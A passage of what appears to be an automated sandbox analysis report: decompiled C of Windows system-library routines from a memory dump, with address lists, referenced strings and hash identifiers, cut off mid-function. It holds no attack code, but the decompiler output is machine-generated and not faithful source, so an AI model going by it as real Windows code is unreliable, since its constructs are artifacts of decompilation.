                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                      																						_t91 =  *(_t177 + 0x20);
                                                      																						goto L26;
                                                      																					}
                                                      																				}
                                                      																				goto L35;
                                                      																			} else {
                                                      																				L26:
                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                      																				__eflags = _t94;
                                                      																				L27:
                                                      																				 *(_t177 + 0x20) = _t94;
                                                      																				__eflags = _t170 & 0x00008000;
                                                      																				if((_t170 & 0x00008000) != 0) {
                                                      																					_t95 = _a12;
                                                      																					__eflags = _t95;
                                                      																					if(_t95 != 0) {
                                                      																						_t96 =  *_t95;
                                                      																						__eflags = _t96;
                                                      																						if(_t96 != 0) {
                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                      																							_t40 = _t177 + 0x20;
                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                      																							__eflags =  *_t40;
                                                      																						}
                                                      																					}
                                                      																				}
                                                      																				goto L31;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                      														_t106 =  *(_t147 + 0x20);
                                                      														__eflags = _t106 & 0x00000040;
                                                      														if((_t106 & 0x00000040) != 0) {
                                                      															_t147 = E017DFD22(_t147);
                                                      															__eflags = _t147;
                                                      															if(_t147 == 0) {
                                                      																L41:
                                                      																_t130 = 0xc0000001;
                                                      																L32:
                                                      																_t77 = _t130;
                                                      																goto L33;
                                                      															} else {
                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                      																_t106 =  *(_t147 + 0x20);
                                                      																goto L17;
                                                      															}
                                                      															goto L35;
                                                      														} else {
                                                      															L17:
                                                      															_t108 = _t106 | 0x00000080;
                                                      															__eflags = _t108;
                                                      															 *(_t147 + 0x20) = _t108;
                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                      															goto L18;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											L33:
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L35:
                                                      						return _t77;
                                                      					} else {
                                                      						 *_t75 = 0x1897b80;
                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                      						 *_t134 = _t75;
                                                      						 *0x1897b84 = _t75;
                                                      						_t73 = E017BEB70(_t134, 0x1897b60);
                                                      						if( *0x1897b20 != 0) {
                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                      								_t73 = E017BFF60( *0x1897b20);
                                                      							}
                                                      						}
                                                      						goto L5;
                                                      					}
                                                      				}
                                                      			}

















































                                                      0x0181bde8
                                                      0x0181bdeb
                                                      0x0181bded
                                                      0x0181beb5
                                                      0x0181beb5
                                                      0x0181bebb
                                                      0x0181bebd
                                                      0x0181bec3
                                                      0x0181bed2
                                                      0x0181bedd
                                                      0x0181bedd
                                                      0x0181beed
                                                      0x00000000
                                                      0x0181bdf3
                                                      0x0181bdfe
                                                      0x0181be06
                                                      0x0181be0b
                                                      0x0181be0d
                                                      0x0181be0f
                                                      0x0181be14
                                                      0x0181be19
                                                      0x0181be20
                                                      0x0181be25
                                                      0x0181be27
                                                      0x0181be35
                                                      0x0181be39
                                                      0x0181be46
                                                      0x0181be4f
                                                      0x0181be54
                                                      0x0181be56
                                                      0x0181bef8
                                                      0x0181bef8
                                                      0x00000000
                                                      0x0181be5c
                                                      0x0181be5c
                                                      0x0181be60
                                                      0x00000000
                                                      0x0181be66
                                                      0x0181be66
                                                      0x0181be7f
                                                      0x0181be84
                                                      0x0181be87
                                                      0x0181be89
                                                      0x0181be8b
                                                      0x0181be99
                                                      0x0181be9d
                                                      0x0181bea0
                                                      0x0181beac
                                                      0x0181beaf
                                                      0x0181beb1
                                                      0x0181beb3
                                                      0x0181beb3
                                                      0x00000000
                                                      0x0181bea2
                                                      0x0181bea2
                                                      0x00000000
                                                      0x0181bea2
                                                      0x0181be8d
                                                      0x0181be8d
                                                      0x0181be92
                                                      0x00000000
                                                      0x0181be92
                                                      0x0181be8b
                                                      0x0181be60
                                                      0x0181be3b
                                                      0x0181be3b
                                                      0x0181be3e
                                                      0x00000000
                                                      0x0181be40
                                                      0x0181be40
                                                      0x0181be44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0181be44
                                                      0x0181be3e
                                                      0x0181be29
                                                      0x0181be29
                                                      0x00000000
                                                      0x0181be29
                                                      0x0181be27
                                                      0x00000000
                                                      0x017dfba7
                                                      0x017dfba7
                                                      0x017dfbab
                                                      0x0181bf02
                                                      0x017dfbb1
                                                      0x017dfbb1
                                                      0x017dfbb8
                                                      0x017dfbbd
                                                      0x017dfbbd
                                                      0x017dfbbf
                                                      0x017dfbbf
                                                      0x017dfbc5
                                                      0x017dfbcb
                                                      0x017dfbf8
                                                      0x017dfbf8
                                                      0x017dfbfa
                                                      0x00000000
                                                      0x017dfc00
                                                      0x017dfc00
                                                      0x017dfc03
                                                      0x00000000
                                                      0x017dfc09
                                                      0x017dfc09
                                                      0x017dfc0f
                                                      0x017dfc15
                                                      0x017dfc23
                                                      0x017dfc23
                                                      0x017dfc25
                                                      0x017dfc27
                                                      0x017dfc75
                                                      0x017dfc7c
                                                      0x017dfc84
                                                      0x00000000
                                                      0x017dfc29
                                                      0x017dfc29
                                                      0x017dfc2d
                                                      0x017dfc30
                                                      0x0181bf0f
                                                      0x00000000
                                                      0x017dfc36
                                                      0x017dfc38
                                                      0x017dfc3b
                                                      0x017dfc41
                                                      0x0181bf17
                                                      0x0181bf19
                                                      0x0181bf48
                                                      0x0181bf4b
                                                      0x00000000
                                                      0x0181bf1b
                                                      0x0181bf22
                                                      0x0181bf24
                                                      0x0181bf26
                                                      0x00000000
                                                      0x0181bf2c
                                                      0x0181bf37
                                                      0x0181bf39
                                                      0x0181bf3b
                                                      0x00000000
                                                      0x0181bf41
                                                      0x0181bf41
                                                      0x0181bf41
                                                      0x0181bf41
                                                      0x0181bf45
                                                      0x00000000
                                                      0x0181bf45
                                                      0x0181bf3b
                                                      0x0181bf26
                                                      0x00000000
                                                      0x017dfc47
                                                      0x017dfc47
                                                      0x017dfc49
                                                      0x017dfcb2
                                                      0x017dfcb4
                                                      0x017dfcb6
                                                      0x017dfcdc
                                                      0x017dfcdc
                                                      0x00000000
                                                      0x017dfcb8
                                                      0x017dfcc3
                                                      0x017dfcc5
                                                      0x017dfcc7
                                                      0x00000000
                                                      0x017dfcc9
                                                      0x017dfcc9
                                                      0x017dfccd
                                                      0x00000000
                                                      0x017dfccd
                                                      0x017dfcc7
                                                      0x00000000
                                                      0x017dfc4b
                                                      0x017dfc4b
                                                      0x017dfc4e
                                                      0x017dfc4e
                                                      0x017dfc51
                                                      0x017dfc51
                                                      0x017dfc54
                                                      0x017dfc5a
                                                      0x017dfc5c
                                                      0x017dfc5f
                                                      0x017dfc61
                                                      0x017dfc63
                                                      0x017dfc65
                                                      0x017dfc67
                                                      0x017dfc6e
                                                      0x017dfc72
                                                      0x017dfc72
                                                      0x017dfc72
                                                      0x017dfc72
                                                      0x017dfc67
                                                      0x017dfc61
                                                      0x00000000
                                                      0x017dfc5a
                                                      0x017dfc49
                                                      0x017dfc41
                                                      0x017dfc30
                                                      0x017dfc27
                                                      0x017dfc03
                                                      0x017dfbcd
                                                      0x017dfbd3
                                                      0x017dfbd9
                                                      0x017dfbdc
                                                      0x017dfbde
                                                      0x017dfc99
                                                      0x017dfc9b
                                                      0x017dfc9d
                                                      0x017dfcd5
                                                      0x017dfcd5
                                                      0x017dfc89
                                                      0x017dfc89
                                                      0x00000000
                                                      0x017dfc9f
                                                      0x017dfc9f
                                                      0x017dfca3
                                                      0x00000000
                                                      0x017dfca3
                                                      0x00000000
                                                      0x017dfbe4
                                                      0x017dfbe4
                                                      0x017dfbe4
                                                      0x017dfbe4
                                                      0x017dfbe9
                                                      0x017dfbf2
                                                      0x00000000
                                                      0x017dfbf2
                                                      0x017dfbde
                                                      0x017dfbcb
                                                      0x017dfbab
                                                      0x017dfc8b
                                                      0x017dfc8b
                                                      0x017dfc8c
                                                      0x017dfb80
                                                      0x017dfb72
                                                      0x017dfb5e
                                                      0x017dfc8d
                                                      0x017dfc91
                                                      0x017dfadf
                                                      0x017dfadf
                                                      0x017dfae1
                                                      0x017dfae4
                                                      0x017dfae7
                                                      0x017dfaec
                                                      0x017dfaf8
                                                      0x017dfb00
                                                      0x017dfb07
                                                      0x017dfb0f
                                                      0x017dfb0f
                                                      0x017dfb07
                                                      0x00000000
                                                      0x017dfaf8
                                                      0x017dfadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0181BE0F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-865735534
                                                      • Opcode ID: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                      • Instruction ID: d6b72d5b5bc22bd21ad891813ce1a59008c6536f717f1bdc5eb2faad4b6508ec
                                                      • Opcode Fuzzy Hash: 82a13d00ab65e221f4ee77dcbf5816566e2544b50aba8bd0cbcb0a5bf8b975fa
                                                      • Instruction Fuzzy Hash: 22A10872B0060A8BEB25DF68C4547BAF7B5AF48710F04456EE94BDB685DB30DA42CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E017A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                      				signed char _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				signed int _v52;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t55;
                                                      				signed int _t57;
                                                      				signed int _t58;
                                                      				char* _t62;
                                                      				signed char* _t63;
                                                      				signed char* _t64;
                                                      				signed int _t67;
                                                      				signed int _t72;
                                                      				signed int _t77;
                                                      				signed int _t78;
                                                      				signed int _t88;
                                                      				intOrPtr _t89;
                                                      				signed char _t93;
                                                      				signed int _t97;
                                                      				signed int _t98;
                                                      				signed int _t102;
                                                      				signed int _t103;
                                                      				intOrPtr _t104;
                                                      				signed int _t105;
                                                      				signed int _t106;
                                                      				signed char _t109;
                                                      				signed int _t111;
                                                      				void* _t116;
                                                      
                                                      				_t102 = __edi;
                                                      				_t97 = __edx;
                                                      				_v12 = _v12 & 0x00000000;
                                                      				_t55 =  *[fs:0x18];
                                                      				_t109 = __ecx;
                                                      				_v8 = __edx;
                                                      				_t86 = 0;
                                                      				_v32 = _t55;
                                                      				_v24 = 0;
                                                      				_push(__edi);
                                                      				if(__ecx == 0x1895350) {
                                                      					_t86 = 1;
                                                      					_v24 = 1;
                                                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                      				}
                                                      				_t103 = _t102 | 0xffffffff;
                                                      				if( *0x1897bc8 != 0) {
                                                      					_push(0xc000004b);
                                                      					_push(_t103);
                                                      					E017E97C0();
                                                      				}
                                                      				if( *0x18979c4 != 0) {
                                                      					_t57 = 0;
                                                      				} else {
                                                      					_t57 = 0x18979c8;
                                                      				}
                                                      				_v16 = _t57;
                                                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                      					_t93 = _t109;
                                                      					L23();
                                                      				}
                                                      				_t58 =  *_t109;
                                                      				if(_t58 == _t103) {
                                                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                      					_t58 = _t103;
                                                      					if(__eflags == 0) {
                                                      						_t93 = _t109;
                                                      						E017D1624(_t86, __eflags);
                                                      						_t58 =  *_t109;
                                                      					}
                                                      				}
                                                      				_v20 = _v20 & 0x00000000;
                                                      				if(_t58 != _t103) {
                                                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                      				}
                                                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                      				_t88 = _v16;
                                                      				_v28 = _t104;
                                                      				L9:
                                                      				while(1) {
                                                      					if(E017C7D50() != 0) {
                                                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                      					} else {
                                                      						_t62 = 0x7ffe0382;
                                                      					}
                                                      					if( *_t62 != 0) {
                                                      						_t63 =  *[fs:0x30];
                                                      						__eflags = _t63[0x240] & 0x00000002;
                                                      						if((_t63[0x240] & 0x00000002) != 0) {
                                                      							_t93 = _t109;
                                                      							E0183FE87(_t93);
                                                      						}
                                                      					}
                                                      					if(_t104 != 0xffffffff) {
                                                      						_push(_t88);
                                                      						_push(0);
                                                      						_push(_t104);
                                                      						_t64 = E017E9520();
                                                      						goto L15;
                                                      					} else {
                                                      						while(1) {
                                                      							_t97 =  &_v8;
                                                      							_t64 = E017DE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                      							if(_t64 == 0x102) {
                                                      								break;
                                                      							}
                                                      							_t93 =  *(_t109 + 4);
                                                      							_v8 = _t93;
                                                      							if((_t93 & 0x00000002) != 0) {
                                                      								continue;
                                                      							}
                                                      							L15:
                                                      							if(_t64 == 0x102) {
                                                      								break;
                                                      							}
                                                      							_t89 = _v24;
                                                      							if(_t64 < 0) {
                                                      								L017FDF30(_t93, _t97, _t64);
                                                      								_push(_t93);
                                                      								_t98 = _t97 | 0xffffffff;
                                                      								__eflags =  *0x1896901;
                                                      								_push(_t109);
                                                      								_v52 = _t98;
                                                      								if( *0x1896901 != 0) {
                                                      									_push(0);
                                                      									_push(1);
                                                      									_push(0);
                                                      									_push(0x100003);
                                                      									_push( &_v12);
                                                      									_t72 = E017E9980();
                                                      									__eflags = _t72;
                                                      									if(_t72 < 0) {
                                                      										_v12 = _t98 | 0xffffffff;
                                                      									}
                                                      								}
                                                      								asm("lock cmpxchg [ecx], edx");
                                                      								_t111 = 0;
                                                      								__eflags = 0;
                                                      								if(0 != 0) {
                                                      									__eflags = _v12 - 0xffffffff;
                                                      									if(_v12 != 0xffffffff) {
                                                      										_push(_v12);
                                                      										E017E95D0();
                                                      									}
                                                      								} else {
                                                      									_t111 = _v12;
                                                      								}
                                                      								return _t111;
                                                      							} else {
                                                      								if(_t89 != 0) {
                                                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                      									_t77 = E017C7D50();
                                                      									__eflags = _t77;
                                                      									if(_t77 == 0) {
                                                      										_t64 = 0x7ffe0384;
                                                      									} else {
                                                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                      									}
                                                      									__eflags =  *_t64;
                                                      									if( *_t64 != 0) {
                                                      										_t64 =  *[fs:0x30];
                                                      										__eflags = _t64[0x240] & 0x00000004;
                                                      										if((_t64[0x240] & 0x00000004) != 0) {
                                                      											_t78 = E017C7D50();
                                                      											__eflags = _t78;
                                                      											if(_t78 == 0) {
                                                      												_t64 = 0x7ffe0385;
                                                      											} else {
                                                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                      											}
                                                      											__eflags =  *_t64 & 0x00000020;
                                                      											if(( *_t64 & 0x00000020) != 0) {
                                                      												_t64 = E01827016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								return _t64;
                                                      							}
                                                      						}
                                                      						_t97 = _t88;
                                                      						_t93 = _t109;
                                                      						E0183FDDA(_t97, _v12);
                                                      						_t105 =  *_t109;
                                                      						_t67 = _v12 + 1;
                                                      						_v12 = _t67;
                                                      						__eflags = _t105 - 0xffffffff;
                                                      						if(_t105 == 0xffffffff) {
                                                      							_t106 = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							_t106 =  *(_t105 + 0x14);
                                                      						}
                                                      						__eflags = _t67 - 2;
                                                      						if(_t67 > 2) {
                                                      							__eflags = _t109 - 0x1895350;
                                                      							if(_t109 != 0x1895350) {
                                                      								__eflags = _t106 - _v20;
                                                      								if(__eflags == 0) {
                                                      									_t93 = _t109;
                                                      									E0183FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                      								}
                                                      							}
                                                      						}
                                                      						_push("RTL: Re-Waiting\n");
                                                      						_push(0);
                                                      						_push(0x65);
                                                      						_v20 = _t106;
                                                      						E01835720();
                                                      						_t104 = _v28;
                                                      						_t116 = _t116 + 0xc;
                                                      						continue;
                                                      					}
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                      • Instruction ID: 3af340d522a7e3ea23999dedcdd3ef0ea535011ae7c9c09c8d2351dfc3d8a7da
                                                      • Opcode Fuzzy Hash: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                      • Instruction Fuzzy Hash: 72612832A046059BDB32DF6CC848B7EF7A0EB85714F58029DD711973C2CB349E848792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E01870EA5(void* __ecx, void* __edx) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				intOrPtr _v28;
                                                      				unsigned int _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				char _v44;
                                                      				intOrPtr _v64;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t58;
                                                      				unsigned int _t60;
                                                      				intOrPtr _t62;
                                                      				char* _t67;
                                                      				char* _t69;
                                                      				void* _t80;
                                                      				void* _t83;
                                                      				intOrPtr _t93;
                                                      				intOrPtr _t115;
                                                      				char _t117;
                                                      				void* _t120;
                                                      
                                                      				_t83 = __edx;
                                                      				_t117 = 0;
                                                      				_t120 = __ecx;
                                                      				_v44 = 0;
                                                      				if(E0186FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                      					L24:
                                                      					_t109 = _v44;
                                                      					if(_v44 != 0) {
                                                      						E01871074(_t83, _t120, _t109, _t117, _t117);
                                                      					}
                                                      					L26:
                                                      					return _t117;
                                                      				}
                                                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                      				_t5 = _t83 + 1; // 0x1
                                                      				_v36 = _t5 << 0xc;
                                                      				_v40 = _t93;
                                                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                      				asm("sbb ebx, ebx");
                                                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                      				if(_t58 != 0) {
                                                      					_push(0);
                                                      					_push(0x14);
                                                      					_push( &_v24);
                                                      					_push(3);
                                                      					_push(_t93);
                                                      					_push(0xffffffff);
                                                      					_t80 = E017E9730();
                                                      					_t115 = _v64;
                                                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                      						_push(_t93);
                                                      						E0186A80D(_t115, 1, _v20, _t117);
                                                      						_t83 = 4;
                                                      					}
                                                      				}
                                                      				if(E0186A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                      					goto L24;
                                                      				}
                                                      				_t60 = _v32;
                                                      				_t97 = (_t60 != 0x100000) + 1;
                                                      				_t83 = (_v44 -  *0x1898b04 >> 0x14) + (_v44 -  *0x1898b04 >> 0x14);
                                                      				_v28 = (_t60 != 0x100000) + 1;
                                                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                      				_v40 = _t62;
                                                      				if(_t83 >= _t62) {
                                                      					L10:
                                                      					asm("lock xadd [eax], ecx");
                                                      					asm("lock xadd [eax], ecx");
                                                      					if(E017C7D50() == 0) {
                                                      						_t67 = 0x7ffe0380;
                                                      					} else {
                                                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      					}
                                                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      						E0186138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                      					}
                                                      					if(E017C7D50() == 0) {
                                                      						_t69 = 0x7ffe0388;
                                                      					} else {
                                                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      					}
                                                      					if( *_t69 != 0) {
                                                      						E0185FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                      					}
                                                      					if(( *0x1898724 & 0x00000008) != 0) {
                                                      						E018652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                      					}
                                                      					_t117 = _v44;
                                                      					goto L26;
                                                      				}
                                                      				while(E018715B5(0x1898ae4, _t83, _t97, _t97) >= 0) {
                                                      					_t97 = _v28;
                                                      					_t83 = _t83 + 2;
                                                      					if(_t83 < _v40) {
                                                      						continue;
                                                      					}
                                                      					goto L10;
                                                      				}
                                                      				goto L24;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                      • Instruction ID: 5985b3f61cda4dffb816ec51dbd69074874953d95e56f80dd704a32f8d83fc7b
                                                      • Opcode Fuzzy Hash: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                      • Instruction Fuzzy Hash: B7518C713043429FE325DF28D888B1BBBE9EBC5704F04092CFA96D7691D671EA45CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E017DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				char* _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				intOrPtr _v32;
                                                      				char _v36;
                                                      				char _v44;
                                                      				char _v52;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				intOrPtr _v72;
                                                      				void* _t51;
                                                      				void* _t58;
                                                      				signed short _t82;
                                                      				short _t84;
                                                      				signed int _t91;
                                                      				signed int _t100;
                                                      				signed short* _t103;
                                                      				void* _t108;
                                                      				intOrPtr* _t109;
                                                      
                                                      				_t103 = __ecx;
                                                      				_t82 = __edx;
                                                      				_t51 = E017C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                      				if(_t51 >= 0) {
                                                      					_push(0x21);
                                                      					_push(3);
                                                      					_v56 =  *0x7ffe02dc;
                                                      					_v20 =  &_v52;
                                                      					_push( &_v44);
                                                      					_v28 = 0x18;
                                                      					_push( &_v28);
                                                      					_push(0x100020);
                                                      					_v24 = 0;
                                                      					_push( &_v60);
                                                      					_v16 = 0x40;
                                                      					_v12 = 0;
                                                      					_v8 = 0;
                                                      					_t58 = E017E9830();
                                                      					_t87 =  *[fs:0x30];
                                                      					_t108 = _t58;
                                                      					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                      					if(_t108 < 0) {
                                                      						L11:
                                                      						_t51 = _t108;
                                                      					} else {
                                                      						_push(4);
                                                      						_push(8);
                                                      						_push( &_v36);
                                                      						_push( &_v44);
                                                      						_push(_v60);
                                                      						_t108 = E017E9990();
                                                      						if(_t108 < 0) {
                                                      							L10:
                                                      							_push(_v60);
                                                      							E017E95D0();
                                                      							goto L11;
                                                      						} else {
                                                      							_t109 = L017C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                      							if(_t109 == 0) {
                                                      								_t108 = 0xc0000017;
                                                      								goto L10;
                                                      							} else {
                                                      								_t21 = _t109 + 0x18; // 0x18
                                                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                      								 *_t109 = 1;
                                                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                      								 *(_t109 + 0xe) = _t82;
                                                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                      								E017EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                      								_t91 =  *_t103 & 0x0000ffff;
                                                      								_t100 = _t91 & 0xfffffffe;
                                                      								_t84 = 0x5c;
                                                      								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                      										_push(_v60);
                                                      										E017E95D0();
                                                      										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                      										_t51 = 0xc0000106;
                                                      									} else {
                                                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                      										goto L5;
                                                      									}
                                                      								} else {
                                                      									L5:
                                                      									 *_a4 = _t109;
                                                      									_t51 = 0;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t51;
                                                      			}


























                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: f3b6b212d9d1973919cb08100380ccadc0a47dc0270ed9ae35e08c132ed55ea8
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: 93516A725047159BC320DF29C844A6BFBF8FF88710F00892DFA9697690E7B4E904CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E01823540(intOrPtr _a4) {
                                                      				signed int _v12;
                                                      				intOrPtr _v88;
                                                      				intOrPtr _v92;
                                                      				char _v96;
                                                      				char _v352;
                                                      				char _v1072;
                                                      				intOrPtr _v1140;
                                                      				intOrPtr _v1148;
                                                      				char _v1152;
                                                      				char _v1156;
                                                      				char _v1160;
                                                      				char _v1164;
                                                      				char _v1168;
                                                      				char* _v1172;
                                                      				short _v1174;
                                                      				char _v1176;
                                                      				char _v1180;
                                                      				char _v1192;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				short _t41;
                                                      				short _t42;
                                                      				intOrPtr _t80;
                                                      				intOrPtr _t81;
                                                      				signed int _t82;
                                                      				void* _t83;
                                                      
                                                      				_v12 =  *0x189d360 ^ _t82;
                                                      				_t41 = 0x14;
                                                      				_v1176 = _t41;
                                                      				_t42 = 0x16;
                                                      				_v1174 = _t42;
                                                      				_v1164 = 0x100;
                                                      				_v1172 = L"BinaryHash";
                                                      				_t81 = E017E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                      				if(_t81 < 0) {
                                                      					L11:
                                                      					_t75 = _t81;
                                                      					E01823706(0, _t81, _t79, _t80);
                                                      					L12:
                                                      					if(_a4 != 0xc000047f) {
                                                      						E017EFA60( &_v1152, 0, 0x50);
                                                      						_v1152 = 0x60c201e;
                                                      						_v1148 = 1;
                                                      						_v1140 = E01823540;
                                                      						E017EFA60( &_v1072, 0, 0x2cc);
                                                      						_push( &_v1072);
                                                      						E017FDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                      						E01830C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                      						_push(_v1152);
                                                      						_push(0xffffffff);
                                                      						E017E97C0();
                                                      					}
                                                      					return E017EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                      				}
                                                      				_t79 =  &_v352;
                                                      				_t81 = E01823971(0, _a4,  &_v352,  &_v1156);
                                                      				if(_t81 < 0) {
                                                      					goto L11;
                                                      				}
                                                      				_t75 = _v1156;
                                                      				_t79 =  &_v1160;
                                                      				_t81 = E01823884(_v1156,  &_v1160,  &_v1168);
                                                      				if(_t81 >= 0) {
                                                      					_t80 = _v1160;
                                                      					E017EFA60( &_v96, 0, 0x50);
                                                      					_t83 = _t83 + 0xc;
                                                      					_push( &_v1180);
                                                      					_push(0x50);
                                                      					_push( &_v96);
                                                      					_push(2);
                                                      					_push( &_v1176);
                                                      					_push(_v1156);
                                                      					_t81 = E017E9650();
                                                      					if(_t81 >= 0) {
                                                      						if(_v92 != 3 || _v88 == 0) {
                                                      							_t81 = 0xc000090b;
                                                      						}
                                                      						if(_t81 >= 0) {
